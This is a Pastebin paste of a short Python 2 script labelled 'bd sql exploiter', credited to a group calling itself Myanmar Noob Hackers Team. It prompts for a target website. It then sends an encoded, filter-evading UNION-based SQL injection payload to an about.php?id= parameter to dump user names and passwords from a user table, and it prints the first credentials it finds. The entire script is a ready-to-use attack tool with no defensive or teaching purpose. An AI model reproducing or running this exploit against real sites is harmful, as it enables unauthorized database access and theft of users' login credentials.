mnh_Pastebin

bd sql exploiter

Apr 10th, 2019
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.42 KB | None | 0 0
  1. #!/usr/bin/env python
  2. #-*- coding: utf-8 -*-
  3. import urllib2
  4. import re
  5. print('''\033[1;36m
  6. ╔═╗╔═╗ ╦ ╦┌┐┌ ┬┌─┐┌─┐┌┬┐┬┌─┐┌┐┌ ╔═╗─┐ ┬┌─┐┬ ┌─┐┬┌┬┐┌─┐┬─┐
  7. ╚═╗║═╬╗║ ║│││ │├┤ │ │ ││ ││││ ║╣ ┌┴┬┘├─┘│ │ ││ │ ├┤ ├┬┘
  8. ╚═╝╚═╝╚╩═╝ ╩┘└┘└┘└─┘└─┘ ┴ ┴└─┘┘└┘ ╚═╝┴ └─┴ ┴─┘└─┘┴ ┴ └─┘┴└─''')
  9. print('''\033[1;33m [ Author : Myanmar Noob Hackers Team ]
  10. {Usage:
  11. Target : www.example.com}
  12. ''')
  13.  
  14. site = raw_input("\033[1;32m\n Target: ")
  15.  
  16. #Basic filter of input
  17. site = site.replace('https://', '')
  18. site = site.replace('http://', '')
  19. tar_list = site.split('/')
  20. for tar in tar_list:
  21. if tar == '':
  22. tar_list.remove(tar)
  23. site = '/'.join(tar_list)
  24. site = 'http://' + site
  25.  
  26. #Read and Get Data
  27. url = urllib2.urlopen( str(site) +"/about.php?id=LU5JLTAwMDAzJyAgLyohNTAwMDBVbklvTiovIC8qITUwMDAwU2VMZUN0Ki8gMSwyLDMsLyohNTAwMDBHcm91cF9jb25DYXQoLyohMHg1NTczNjU3MjUwNjE3MzczN2UsVEJMMTFfVVNFUl9OQU1FLDB4M2EsVEJMMTFfVVNFUl9QQVNTLDB4M2M2MjcyM2UqLyksNSw2LDcsOCw5LDEwLDExIGYvKiFmcm9NKi8gY29yZV91c2VyX2luZm8tLSAr").read()
  28.  
  29. #Find First Username and Password
  30. source = re.findall("UserPass~(.*?)<br>",url)[0]
  31. print('''\033[1;31m Found : %s'''%source)
Advertisement
Add Comment
Please, Sign In to add comment